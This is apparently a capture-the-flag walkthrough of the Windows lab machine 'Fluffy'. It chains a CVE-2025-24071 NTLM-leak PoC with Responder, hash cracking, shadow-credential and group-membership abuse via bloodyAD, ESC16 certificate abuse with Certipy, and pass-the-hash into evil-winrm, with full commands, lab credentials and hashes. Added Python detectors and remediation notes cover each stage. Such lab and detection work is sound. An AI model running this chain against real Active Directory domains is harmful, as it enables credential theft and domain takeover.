
# Fluffy

<figure><img src="/files/2vj3eQocp0GPJeLONsM0" alt=""><figcaption></figcaption></figure>

Fluffy is an easy-difficulty Windows machine designed to simulate an Assumed Breach scenario, in which credentials for a low-privileged user are provided. By exploiting CVE-2025-24071 it is possible to obtain the credentials of another user with limited privileges. Closer analysis reveals ACLs (Access Control Lists) over the `winrm_svc` and `ca_svc` accounts. WinRM can then be used to log in to the target with the `winrm_svc` account. Exploiting a vulnerability in the ADCS service (ESC16) with the `ca_svc` account is required to gain access to the Administrator account.

***

### Initial Enumeration

Since this is an Assumed Breach scenario, we start the machine with the following credentials:

```text
j.fleischman / J0elTHEM4n1990!
```

To enumerate the host and generate a hosts file, we use:

```bash
Fluffy » nxc smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --generate-hosts-file hosts
SMB         10.129.232.88   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.232.88   445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!

Fluffy » cat hosts
10.129.232.88     DC01.fluffy.htb fluffy.htb DC01

Fluffy » cat hosts | sudo tee -a /etc/hosts

```

> If you are in a lab with no dns resolution you can use option `--generate-hosts-file` to generate a host file for you and avoid DNS problem when using LDAP or Kerberos protocols.

#### Shares

Looking at the shares, we find one called "IT" on which our user has read and write permission.

```bash
Fluffy » nxc smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB         10.129.232.88   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.232.88   445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB         10.129.232.88   445    DC01             [*] Enumerated shares
SMB         10.129.232.88   445    DC01             Share           Permissions     Remark
SMB         10.129.232.88   445    DC01             -----           -----------     ------
SMB         10.129.232.88   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.232.88   445    DC01             C$                              Default share
SMB         10.129.232.88   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.232.88   445    DC01             IT              READ,WRITE
SMB         10.129.232.88   445    DC01             NETLOGON        READ            Logon server share
SMB         10.129.232.88   445    DC01             SYSVOL          READ            Logon server share

```

Inside it, we find installer files along with the document `Upgrade_Notice.pdf`.

```bash
Fluffy » smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@dc01.fluffy.htb -dc-ip 10.129.232.88
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use IT
# ls
drw-rw-rw-          0  Wed Feb  4 04:30:33 2026 .
drw-rw-rw-          0  Wed Feb  4 04:30:33 2026 ..
drw-rw-rw-          0  Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw-    1827464  Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw-          0  Fri May 16 11:51:49 2025 KeePass-2.58
-rw-rw-rw-    3225346  Fri May 16 11:51:49 2025 KeePass-2.58.zip
-rw-rw-rw-     169963  Sat May 17 11:31:07 2025 Upgrade_Notice.pdf

# get Upgrade_Notice.pdf

```

<figure><img src="/files/I3kj7AfIHzbMWNrePbeR" alt=""><figcaption></figcaption></figure>

***

### CVE-2025-24071

The document downloaded earlier contains references to several recent vulnerabilities. One of them fits our scenario:

> Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

> <https://nvd.nist.gov/vuln/detail/CVE-2025-24071>

<https://github.com/Marcejr117/CVE-2025-24071_PoC>

```bash
Fluffy/CVE-2025-24071_PoC (main) » python3 PoC.py jpg.zip 10.10.16.99
[+] File jpg.zip.library-ms created successfully.
```

The file generated by the PoC, together with **Responder**, lets us capture the NetNTLMv2 hash of the user `P.Agila`.

```bash
Fluffy » smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@dc01.fluffy.htb -dc-ip 10.129.232.88
Impacket v0.13.0.dev0+20251002.113829.eaf2e556 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use IT
# ls
drw-rw-rw-          0  Wed Feb  4 04:30:33 2026 .
drw-rw-rw-          0  Wed Feb  4 04:30:33 2026 ..
drw-rw-rw-          0  Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64
-rw-rw-rw-    1827464  Fri May 16 11:51:49 2025 Everything-1.4.1.1026.x64.zip
drw-rw-rw-          0  Fri May 16 11:51:49 2025 KeePass-2.58
-rw-rw-rw-    3225346  Fri May 16 11:51:49 2025 KeePass-2.58.zip
-rw-rw-rw-     169963  Sat May 17 11:31:07 2025 Upgrade_Notice.pdf

# !ls
exploit.zip
lextab.py
PoC.py
README.md
usecase.gif

# put exploit.zip

```

#### Capturing the Hash

```bash
Responder (master) » sudo python3 Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:39263493d725839c:[...]

```
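From the defender's side, the artifact this step leaves behind in the share is a `.library-ms` document whose library location is a UNC path to a host the organisation does not own. The following Python is an added example, not code from this writeup or from the PoC repository: it parses the Windows Library Description XML, extracts every `<simpleLocation>/<url>`, and flags UNC locations whose host is neither inside the assumed corporate DNS suffix `.fluffy.htb` nor inside the assumed internal range `10.129.0.0/16`. The two XML fixtures are constructed for the example.

```python
# Added example (not from the writeup): flag .library-ms files whose library
# location is a UNC path to a host outside the organisation. A file like this
# dropped into a writable share is the bait for the NTLM leak in CVE-2025-24071.
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Library Description (.library-ms) files.
LIB = "{http://schemas.microsoft.com/windows/2009/library}"

# Assumptions for this example: the corporate DNS suffix and address range.
TRUSTED_SUFFIX = ".fluffy.htb"
INTERNAL_NETS = [ipaddress.ip_network("10.129.0.0/16")]

UNC_HOST = re.compile(r"^\\\\([^\\]+)")  # \\host\share -> host


def library_locations(xml_bytes: bytes) -> list[str]:
    """Every <url> under a <simpleLocation> element of a .library-ms document."""
    root = ET.fromstring(xml_bytes)
    urls = []
    for loc in root.iter(LIB + "simpleLocation"):
        url = loc.find(LIB + "url")
        if url is not None and url.text:
            urls.append(url.text.strip())
    return urls


def host_is_internal(host: str) -> bool:
    """True for our DNS suffix or an address inside our internal ranges."""
    host = host.lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # a DNS name rather than an IP literal
        return host.endswith(TRUSTED_SUFFIX) or host == TRUSTED_SUFFIX.lstrip(".")
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_locations(xml_bytes: bytes) -> list[str]:
    """UNC locations pointing at hosts that are not ours: treat as NTLM-coercion bait."""
    hits = []
    for url in library_locations(xml_bytes):
        m = UNC_HOST.match(url)
        if m and not host_is_internal(m.group(1)):
            hits.append(url)
    return hits


# Constructed fixtures for the example (not files taken from the box).
BENIGN = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\dc01.fluffy.htb\IT</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

BAIT = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\10.10.16.99\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("bait", BAIT)):
        print(name, suspicious_locations(doc))
```

Run over the contents of a share such as IT, this turns a silent credential leak into an alert the moment the file lands; pairing it with the vendor patch for CVE-2025-24071 and with egress filtering of SMB (TCP 445) from client subnets removes the path the leaked hash travels on.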

Using Hashcat we can identify and crack the hash.

```bash
Fluffy » hashcat --identify hash
The following hash-mode match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
   5600 | NetNTLMv2                                                  | Network Protocol

```

```bash
P.AGILA::FLUFFY:39263493d725839c:29aea93efde6b9716d39951518e37ceb:010100000000000080c869625995dc011b3f0ddf4f453bb700000000020008004b00510054004d0001001e00570049004e002d0045005300540053004a0053003800420052003800520004003400570049004e002d0045005300540053004a005300380042005200380052002e004b00510054004d002e004c004f00430041004c00030014004b00510054004d002e004c004f00430041004c00050014004b00510054004d002e004c004f00430041004c000700080080c869625995dc0106000400020000000800300030000000000000000100000000200000489098651f23feb7d1dd7d252945097ecc0ad15052fb486ab0f30673d80cdc440a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00390039000000000000000000:prometheusx-303

```

```bash
Fluffy » nxc smb 10.129.232.88 -u 'p.agila' -p 'prometheusx-303'
SMB         10.129.232.88   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.232.88   445    DC01             [+] fluffy.htb\\p.agila:prometheusx-303

```

***

### Mapping Permissions with BloodHound

Our new user is a member of the Service Account Managers group, which has GenericAll over the Service Accounts group. That group in turn has GenericWrite over three service accounts.

<figure><img src="/files/geTcTrG1p7LkooKmnlWa" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/fCuHqS6DFzRhIZHgGDM0" alt=""><figcaption></figcaption></figure>

Thanks to GenericAll, we can add ourselves to the `Service Accounts` group.

```bash
Fluffy » bloodyAD.py --host DC01.FLUFFY.HTB -d FLUFFY.HTB  --dc-ip 10.129.232.88 -u p.agila -p 'prometheusx-303' add groupMember "Service Accounts" p.agila
[+] p.agila added to Service Accounts
```

Once we are in the group, we have control over the service accounts, which enables a `Shadow Credentials` attack followed by `Pass-the-Hash`.

> <https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials>

> <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials>

```bash
Fluffy » bloodyAD.py --host DC01.FLUFFY.HTB -d FLUFFY.HTB  --dc-ip 10.129.232.88 -u p.agila -p 'prometheusx-303' add shadowCredentials ca_svc
[+] KeyCredential generated with following sha256 of RSA key: 4c87049379391a78da4c3520a7ea355700b97a3ea56baa40416e96a0b4243da0
[+] TGT stored in ccache file ca_svc_ks.ccache

NT: ca0f4f9e9eb8a092addf53bb03fc98c8

```
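Both of the steps above leave a clear trail in the domain controller's Security log: adding yourself to a group produces event 4728 (member added to a security-enabled global group), and writing a key credential produces event 5136 (directory object modified) for the attribute `msDS-KeyCredentialLink`. The Python below is an added example, not code from the writeup: it runs two checks over constructed event records shaped like the EventData fields of those two events. The records, the workstation name `WS01$` and the `allowed_writers` allow-list are assumptions for the example.

```python
# Added example (not from the writeup): detect the two audit events that the
# group self-add and the shadow-credential write leave behind. Records are
# constructed dicts shaped like the EventData of Security events 4728 and 5136.
from typing import Iterable

VALUE_ADDED = "%%14674"         # OperationType of a 5136 "value added" change
KEY_CRED = "msds-keycredentiallink"


def cn_from_dn(dn: str) -> str:
    """'CN=ca_svc,CN=Users,DC=fluffy,DC=htb' -> 'ca_svc'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def self_group_adds(events: Iterable[dict]) -> list[tuple[str, str]]:
    """4728 events where the actor added *their own* account to a group."""
    hits = []
    for e in events:
        if e.get("EventID") != 4728:
            continue
        actor = e["SubjectUserName"].lower()
        member = cn_from_dn(e["MemberName"]).lower()
        if actor == member:
            hits.append((e["SubjectUserName"], e["TargetUserName"]))
    return hits


def key_credential_writes(events: Iterable[dict],
                          allowed_writers: frozenset = frozenset()) -> list[tuple[str, str]]:
    """5136 events that add a msDS-KeyCredentialLink value to an object other than
    the writer's own account. An object writing to its own attribute is treated as
    expected; known provisioning identities can be allow-listed."""
    hits = []
    for e in events:
        if e.get("EventID") != 5136:
            continue
        if e.get("AttributeLDAPDisplayName", "").lower() != KEY_CRED:
            continue
        if e.get("OperationType") != VALUE_ADDED:
            continue
        writer = e["SubjectUserName"]
        target = cn_from_dn(e["ObjectDN"])
        if writer.rstrip("$").lower() == target.lower() or writer in allowed_writers:
            continue
        hits.append((writer, target))
    return hits


SAMPLE_EVENTS = [  # constructed records, not logs pulled from the machine
    {"EventID": 4728, "SubjectUserName": "p.agila",
     "MemberName": "CN=p.agila,CN=Users,DC=fluffy,DC=htb", "TargetUserName": "Service Accounts"},
    {"EventID": 5136, "SubjectUserName": "p.agila", "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    # A computer account writing its own key credential: not flagged.
    {"EventID": 5136, "SubjectUserName": "WS01$", "ObjectDN": "CN=WS01,CN=Computers,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    # Unrelated attribute change on the same object: not flagged.
    {"EventID": 5136, "SubjectUserName": "p.agila", "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

if __name__ == "__main__":
    print(self_group_adds(SAMPLE_EVENTS))        # [('p.agila', 'Service Accounts')]
    print(key_credential_writes(SAMPLE_EVENTS))  # [('p.agila', 'ca_svc')]
```

Event 5136 is only written when "Audit Directory Service Changes" is enabled and the target objects carry a SACL covering writes to `msDS-KeyCredentialLink`, so the check is worthless without that audit configuration; the underlying fix is to remove GenericAll/GenericWrite grants that let ordinary users reach service accounts at all.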

With the CA account, we can enumerate certificate templates looking for possible privilege escalation paths.

### Privilege Escalation

#### Certipy

```bash
Fluffy » certipy find -vulnerable -u ca_svc -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.232.88 -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates

```

The Certipy wiki is an excellent reference for certificate-based attacks, and we will use it to exploit **ESC16**.

> [https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally)

The attack consists of:

* **Update the victim's UPN to the Administrator's `sAMAccountName`.**

```bash
Fluffy » certipy account \
    -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' \
    -dc-ip '10.129.232.88' -user 'ca_svc' -upn "Administrator" \
    update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_svc'
```

* **Request a certificate as the "victim" using an authentication template on the CA vulnerable to ESC16.**

```bash
Fluffy » certipy req -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip '10.129.232.88' -template 'User' -ca 'fluffy-DC01-CA' -dc-host dc01.fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

```

* **Revert the victim's UPN.**

```bash
Fluffy » certipy account \
    -u 'ca_svc@fluffy.htb' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' \
    -dc-ip '10.129.232.88' -user 'ca_svc' -upn "ca_svc" \
    update
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc
[*] Successfully updated 'ca_svc'
```

* **Authenticate as Administrator.**

```bash
Fluffy » certipy auth -dc-ip 10.129.232.88 -pfx administrator.pfx -username administrator -domain fluffy.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```

```bash
Fluffy » evil-winrm -i 10.129.232.88 -u Administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'

Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b9a7c9737e905da42a6a************
```
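The ESC16 chain above has two observable parts: a configuration precondition (the Certipy output lists `1.3.6.1.4.1.311.25.2`, the SID security extension, under the CA's disabled extensions) and an audit trail on the domain controller (event 4738, user account changed, with a new `UserPrincipalName`, followed by event 4887, certificate issued, for the same account, and then a second 4738 reverting the UPN). The Python below is an added example, not code from the writeup or from Certipy: it checks the precondition from a list of disabled OIDs and correlates constructed 4738/4887 records to flag an account whose UPN was set to another known account's `sAMAccountName` shortly before a certificate was issued to it. The event records, the `KNOWN_ACCOUNTS` list and the names `j.doe` and `helpdesk` are assumptions for the example.

```python
# Added example (not from the writeup): check the ESC16 precondition and
# correlate the audit trail of a UPN swap. Records are constructed dicts shaped
# like the EventData of Security events 4738 (user changed) and 4887 (cert issued).
from datetime import datetime, timedelta
from typing import Iterable

SID_EXTENSION_OID = "1.3.6.1.4.1.311.25.2"  # szOID_NTDS_CA_SECURITY_EXT


def ca_missing_sid_extension(disabled_extensions: Iterable[str]) -> bool:
    """ESC16 precondition: the CA omits the SID extension from every certificate."""
    return SID_EXTENSION_OID in set(disabled_extensions)


def _when(e: dict) -> datetime:
    return datetime.fromisoformat(e["Time"])


def upn_impersonation_changes(events: Iterable[dict], known_accounts: Iterable[str]) -> list[dict]:
    """4738 events that set an account's UPN to the name of a *different* known account."""
    known = {a.lower() for a in known_accounts}
    out = []
    for e in events:
        if e.get("EventID") != 4738:
            continue
        new_upn = e.get("UserPrincipalName", "-")
        if new_upn == "-":                      # 4738 reports "-" for unchanged attributes
            continue
        target = e["TargetUserName"].lower()
        upn_user = new_upn.split("@", 1)[0].lower()
        if upn_user != target and upn_user in known:
            out.append({"time": _when(e), "account": target,
                        "impersonated": upn_user, "actor": e["SubjectUserName"]})
    return out


def detect_esc16_chain(events: Iterable[dict], known_accounts: Iterable[str],
                       window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """A suspicious UPN change followed, within `window`, by a certificate issued to that account."""
    events = list(events)
    alerts = []
    for change in upn_impersonation_changes(events, known_accounts):
        for e in events:
            if e.get("EventID") != 4887:
                continue
            requester = e["Requester"].split("\\")[-1].lower()   # DOMAIN\user -> user
            if requester == change["account"] and change["time"] <= _when(e) <= change["time"] + window:
                alerts.append({"account": change["account"], "impersonated": change["impersonated"],
                               "actor": change["actor"], "request_id": e["RequestId"]})
    return alerts


SAMPLE_EVENTS = [  # constructed records, not the machine's real logs
    {"EventID": 4738, "Time": "2025-05-17T11:40:02", "SubjectUserName": "ca_svc",
     "TargetUserName": "ca_svc", "UserPrincipalName": "Administrator"},
    {"EventID": 4887, "Time": "2025-05-17T11:41:10", "Requester": "FLUFFY\\ca_svc",
     "RequestId": "16", "Subject": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb"},
    {"EventID": 4738, "Time": "2025-05-17T11:42:30", "SubjectUserName": "ca_svc",
     "TargetUserName": "ca_svc", "UserPrincipalName": "ca_svc"},          # the revert
    # Benign: a UPN set to the account's own name, then that account's own request.
    {"EventID": 4738, "Time": "2025-05-17T12:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "j.doe", "UserPrincipalName": "j.doe@fluffy.htb"},
    {"EventID": 4887, "Time": "2025-05-17T12:05:00", "Requester": "FLUFFY\\j.doe",
     "RequestId": "17", "Subject": "CN=j.doe,CN=Users,DC=fluffy,DC=htb"},
]
KNOWN_ACCOUNTS = ["Administrator", "ca_svc", "winrm_svc", "p.agila", "j.fleischman", "j.doe", "helpdesk"]

if __name__ == "__main__":
    print(ca_missing_sid_extension(["1.3.6.1.4.1.311.25.2"]))   # True
    for alert in detect_esc16_chain(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(alert)
```

The correlation keys on the requester, not on the certificate subject, because 4887 records the subject DN rather than the SAN UPN that actually drives the mapping. Remediation is on the CA side: remove the SID extension OID from the CA's disabled extension list so issued certificates carry the requester's SID again, and keep the domain controllers in strong certificate mapping enforcement so a certificate without that extension is not accepted for Kerberos logon.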

